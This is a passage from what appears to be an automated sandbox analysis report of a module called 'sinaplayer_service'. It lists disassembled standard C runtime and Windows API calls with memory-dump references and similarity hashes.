                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?,6D0A0D40,0000000C), ref: 6D0A0CA5
                                                                                                                                                                                                    • __output_l.LIBCMT ref: 6D0A0D16
                                                                                                                                                                                                    • __ftbuf.LIBCMT ref: 6D0A0D22
                                                                                                                                                                                                    • _errno.MSVCR120(6D0A0D40,0000000C), ref: 6D0D5539
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0A0D40,0000000C), ref: 6D0D5544
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,?,?,6D0A0D40,0000000C), ref: 6D0D5551
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,?,?,6D0A0D40,0000000C), ref: 6D0D555C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$__ftbuf__output_l_fileno_lock_lock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3923144078-0
                                                                                                                                                                                                    • Opcode ID: b843496a15692c38d07dd9787147f93e9b96d382a8724ee52ac5bab609a52bd8
                                                                                                                                                                                                    • Instruction ID: c78179e32988cf583f10ed9d74c303e0d9d649102759bbb2c2eb0c3bfadaf2ed
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b843496a15692c38d07dd9787147f93e9b96d382a8724ee52ac5bab609a52bd8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3721FBB291C30A9BFB015FF98C8073E35A1AF86378B5A8329F5354F1DAD778D5019611
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0A5C48
                                                                                                                                                                                                    • ??0_ReentrantBlockingLock@details@Concurrency@@QAE@XZ.MSVCR120(00000014,6D0D23E5,0000000C,6D0A500E,E18D5491,?,00000180,?), ref: 6D0A5C73
                                                                                                                                                                                                      • Part of subcall function 6D0A5C29: __crtInitializeCriticalSectionEx.MSVCR120(?,00000000,00000180,6D0A4ACC,?,?,?,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A5C35
                                                                                                                                                                                                    • ??0_ReentrantBlockingLock@details@Concurrency@@QAE@XZ.MSVCR120(00000014,6D0D23E5,0000000C,6D0A500E,E18D5491,?,00000180,?), ref: 6D0A5CA4
                                                                                                                                                                                                      • Part of subcall function 6D0A6F10: TlsAlloc.KERNEL32 ref: 6D0A6F16
                                                                                                                                                                                                      • Part of subcall function 6D0A5760: Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 6D0A5829
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::DetermineTopology.LIBCMT ref: 6D0A5CC2
                                                                                                                                                                                                      • Part of subcall function 6D0A5A97: ??_U@YAPAXI@Z.MSVCR120(00000000,?,6D0A3A7E,00000000,0000000C,6D0A500E,E18D5491,?,00000180,?), ref: 6D0A5ACF
                                                                                                                                                                                                      • Part of subcall function 6D0A5A97: memset.MSVCR120(00000000,00000000,?,00000000,?,6D0A3A7E,00000000,0000000C,6D0A500E,E18D5491,?,00000180,?), ref: 6D0A5AE0
                                                                                                                                                                                                      • Part of subcall function 6D0A5A97: ??_U@YAPAXI@Z.MSVCR120(00000000,00000000,00000000,?,00000000,?,6D0A3A7E,00000000,0000000C,6D0A500E,E18D5491,?,00000180,?), ref: 6D0A5B05
                                                                                                                                                                                                      • Part of subcall function 6D0A5A97: memset.MSVCR120(00000000,00000000,?,?,?,?,6D0A3A7E,00000000,0000000C,6D0A500E,E18D5491,?,00000180,?), ref: 6D0A5B24
                                                                                                                                                                                                      • Part of subcall function 6D0A5A97: Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 6D0A5B75
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,00000014,6D0D23E5,0000000C,6D0A500E,E18D5491,?,00000180,?), ref: 6D0A5CF4
                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004,00000014,6D0D23E5,0000000C,6D0A500E,E18D5491,?,00000180,?), ref: 6D0D2413
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(6D0948CA,00000001,?,?,?,?,?,?,?,?,?,?,?,?,00000000,6D15BB86), ref: 6D0D2433
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(00000000,6D0AC7FC,6D0948CA,00000001), ref: 6D0D2448
                                                                                                                                                                                                      • Part of subcall function 6D0A3C0B: __crtCreateEventExW.MSVCR120(00000000,00000000,00000000,001F0002), ref: 6D0A3C1B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::Manager::ResourceTopology$??0_AllocBlockingCleanupConcurrency@@InformationLock@details@Reentrant__crtmemset$CreateCriticalDetermineEventExceptionH_prolog3InitializeSectionThrowVirtualstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3903250442-0
                                                                                                                                                                                                    • Opcode ID: 2ad95c53e027e7a5c3b6007df82dac6700616b503a226f0cbab51424016e1f82
                                                                                                                                                                                                    • Instruction ID: 8a321f48885de2fdfaab436771a200b59a20e41762dbf5f53f431363a51f9fc1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ad95c53e027e7a5c3b6007df82dac6700616b503a226f0cbab51424016e1f82
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 753147B0904B46EFEB14DFAAC8807D9FBB0BF08304F55852ED6199BA42C7B4A150CF91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32(00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ABED7
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94,00000000), ref: 6D0ABEE2
                                                                                                                                                                                                    • _msize.MSVCR120(00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ABF02
                                                                                                                                                                                                      • Part of subcall function 6D09CA0E: HeapSize.KERNEL32(00000000,00000000,?,6D0ABF07,00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?), ref: 6D09CA26
                                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ABF18
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ABF24
                                                                                                                                                                                                    • _realloc_crt.MSVCR120(00000000,00000800,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1), ref: 6D0ADBFF
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ADC15
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$Encode$Decode$HeapSize_msize_realloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 765448609-0
                                                                                                                                                                                                    • Opcode ID: 360950ab14c0627e4300f190567aac110ff443983662528f7cac815d445d865b
                                                                                                                                                                                                    • Instruction ID: ca43853e29eddd8f01d0a95be484a84c00c5501d35988a06b28506e6cdffcede
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 360950ab14c0627e4300f190567aac110ff443983662528f7cac815d445d865b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C621E731514256EFFB119FB9EC84BAA7BFDEB4A3947454526E901C7101FB71EC008BA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0F85E1
                                                                                                                                                                                                    • free.MSVCR120(00000000,00000014,6D0E9B1B,00000000,00000000,?,6D0F7B9B,00000001,00000000,?,00000000,6D0E9323,?,6D0E9323,?,6D0F881D), ref: 6D0F8631
                                                                                                                                                                                                    • free.MSVCR120(?,00000014,6D0E9B1B,00000000,00000000,?,6D0F7B9B,00000001,00000000,?,00000000,6D0E9323,?,6D0E9323,?,6D0F881D), ref: 6D0F8638
                                                                                                                                                                                                    • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR120(?,00000014,6D0E9B1B,00000000,00000000,?,6D0F7B9B,00000001,00000000,?,00000000,6D0E9323,?,6D0E9323,?,6D0F881D), ref: 6D0F864C
                                                                                                                                                                                                    • free.MSVCR120(?,00000014,6D0E9B1B,00000000,00000000,?,6D0F7B9B,00000001,00000000,?,00000000,6D0E9323,?,6D0E9323,?,6D0F881D), ref: 6D0F8653
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000014,6D0E9B1B,00000000,00000000,?,6D0F7B9B,00000001,00000000,?,00000000,6D0E9323,?,6D0E9323,?,6D0F881D), ref: 6D0F8671
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CE94,00000014,6D0E9B1B,00000000,00000000,?,6D0F7B9B,00000001,00000000,?,00000000,6D0E9323,?,6D0E9323), ref: 6D0F8686
                                                                                                                                                                                                    • ??1event@Concurrency@@QAE@XZ.MSVCR120(00000014,6D0E9B1B,00000000,00000000,?,6D0F7B9B,00000001,00000000,?,00000000,6D0E9323,?,6D0E9323,?,6D0F881D), ref: 6D0F8692
                                                                                                                                                                                                      • Part of subcall function 6D0F8582: __uncaught_exception.MSVCR120(?,?,?,?,6D0E923C,00000001), ref: 6D0F8595
                                                                                                                                                                                                      • Part of subcall function 6D0F8792: ??1_TaskCollection@details@Concurrency@@QAE@XZ.MSVCR120(?,?,?,6D0F861B,00000000,00000014,6D0E9B1B,00000000,00000000,?,6D0F7B9B,00000001,00000000,?,00000000,6D0E9323), ref: 6D0F87BD
                                                                                                                                                                                                      • Part of subcall function 6D0F8792: free.MSVCR120(?,?,?,?,6D0F861B,00000000,00000014,6D0E9B1B,00000000,00000000,?,6D0F7B9B,00000001,00000000,?,00000000), ref: 6D0F87C3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$Concurrency@@Exception$??0exception@std@@??1_??1event@Collection@details@Destroy@@H_prolog3TaskThrow__uncaught_exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 721984979-0
                                                                                                                                                                                                    • Opcode ID: 095689682b93920fc118978bc36b70fce02d1962dbbecb94d59149e88684d10c
                                                                                                                                                                                                    • Instruction ID: d38e45f06b4fbea04c49a82b527501e26d86741f360d90089bac9b7a8f2bca49
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 095689682b93920fc118978bc36b70fce02d1962dbbecb94d59149e88684d10c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F21152B0C096039BFF009F62C4427FD73B0BF01354BA2091C9E716B5A0CB34A953CA84
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(?,?,?), ref: 6D0AF8A0
                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,?,?), ref: 6D0AF8C3
                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,?,?,?,?), ref: 6D0AF8DB
                                                                                                                                                                                                    • _errno.MSVCR120(?,?), ref: 6D0DEEB7
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0DEEC9
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000), ref: 6D0DEED0
                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,?,?,?), ref: 6D0DEEE3
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?), ref: 6D0DEEE5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FilePointer$_errno$ErrorLast__dosmaperr_get_osfhandle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2017882077-0
                                                                                                                                                                                                    • Opcode ID: 49598a0eed627ddafa5c3622783affb68aca319f5e34ef9216d978ecdda580ef
                                                                                                                                                                                                    • Instruction ID: e2c69b415ba32ba3259575809db41c05f58e1c5b3a89082f68ed072e98fef813
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49598a0eed627ddafa5c3622783affb68aca319f5e34ef9216d978ecdda580ef
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB11E33261431ABFFB019AA8DC80FBE777CAB46720F110255F924AB1D1DBB0E8008764
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::GetHistory.LIBCMT ref: 6D0EEC4E
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::GetHistory.LIBCMT ref: 6D0EEC59
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Mean.LIBCMT ref: 6D0EEC62
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Mean.LIBCMT ref: 6D0EEC6C
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Variance.LIBCMT ref: 6D0EECC1
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Variance.LIBCMT ref: 6D0EECCC
                                                                                                                                                                                                    • _CIsqrt.MSVCR120(?,?,?,?), ref: 6D0EECD7
                                                                                                                                                                                                    • _CIexp.MSVCR120(?,?,?,?), ref: 6D0EECE3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Climbing::Concurrency::details::Hill$History::Measured$HistoryMeanVariance$IexpIsqrt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3578402837-0
                                                                                                                                                                                                    • Opcode ID: 2780f5c1e82453fc495b6308699051f1135b20148ffc51c12cf56fe4f93bce92
                                                                                                                                                                                                    • Instruction ID: 82479c6229ca8c995ab4b0c18e74dacc662c50f3c28df7c05adbea78645f752c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2780f5c1e82453fc495b6308699051f1135b20148ffc51c12cf56fe4f93bce92
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E112631E0490DEADF116FA1E9441EDBF34FF84295F228890D99076294EF324AB19BC6
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0AF9A8,00000010), ref: 6D0AF9CC
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0AF9A8,00000010), ref: 6D0DEE59
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AF9A8,00000010), ref: 6D0DEE60
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0AF9A8,00000010), ref: 6D0DEE6D
                                                                                                                                                                                                      • Part of subcall function 6D094206: EnterCriticalSection.KERNEL32(-0000000C,6D094260,00000008,6D0A02F5,00000000,6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30), ref: 6D09424C
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AF9A8,00000010), ref: 6D0DEE77
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0AF9A8,00000010), ref: 6D0DEE82
                                                                                                                                                                                                      • Part of subcall function 6D0AF894: _get_osfhandle.MSVCR120(?,?,?), ref: 6D0AF8A0
                                                                                                                                                                                                      • Part of subcall function 6D0AF894: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,?,?), ref: 6D0AF8C3
                                                                                                                                                                                                      • Part of subcall function 6D0AF894: SetFilePointerEx.KERNEL32(00000000,?,?,?,?), ref: 6D0AF8DB
                                                                                                                                                                                                      • Part of subcall function 6D0AF9C4: __unlock_fhandle.LIBCMT ref: 6D0AF9C5
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AF9A8,00000010), ref: 6D0DEE9F
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0AF9A8,00000010), ref: 6D0DEEAA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno$_errno$FilePointer$CriticalEnterSection__unlock_fhandle_get_osfhandle_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2332042503-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(6D121D58,00000014,6D0D5502,00000000,?), ref: 6D121C81
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(?,6D121D58,00000014,6D0D5502,00000000,?), ref: 6D121CE2
                                                                                                                                                                                                    • FlushFileBuffers.KERNEL32(00000000,6D121D58,00000014,6D0D5502,00000000,?), ref: 6D121CE9
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D121CF3
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6D121D02
                                                                                                                                                                                                    • _errno.MSVCR120(6D121D58,00000014,6D0D5502,00000000,?), ref: 6D121D09
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$BuffersErrorFileFlushLast__doserrno_get_osfhandle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3142512953-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,00000000,?,6D0F3443,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F6106
                                                                                                                                                                                                    • ListArray.LIBCMT ref: 6D0F6109
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,00000000,?,00000000,?,6D0F3443,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F6112
                                                                                                                                                                                                    • ListArray.LIBCMT ref: 6D0F6115
                                                                                                                                                                                                    • ListArray.LIBCMT ref: 6D0F611D
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000000,?,00000000,?,6D0F3443,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F614A
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,00000000,?,00000000,?,6D0F3443,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F6150
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000000,?,00000000,?,6D0F3443,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F6160
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: List$Arrayfree$FlushInterlocked
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1505039951-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,00000000,?,6D0F348C,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F62C2
                                                                                                                                                                                                    • ListArray.LIBCMT ref: 6D0F62C5
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,00000000,?,00000000,?,6D0F348C,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F62CE
                                                                                                                                                                                                    • ListArray.LIBCMT ref: 6D0F62D1
                                                                                                                                                                                                    • ListArray.LIBCMT ref: 6D0F62D9
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000000,?,00000000,?,6D0F348C,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F6306
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,00000000,?,00000000,?,6D0F348C,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F630C
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000000,?,00000000,?,6D0F348C,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F631C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: List$Arrayfree$FlushInterlocked
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1505039951-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,?,?,00000000), ref: 6D092596
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,?,00000000,?), ref: 6D0925BB
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,?,?,00000002), ref: 6D09261B
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,?,?,?), ref: 6D092642
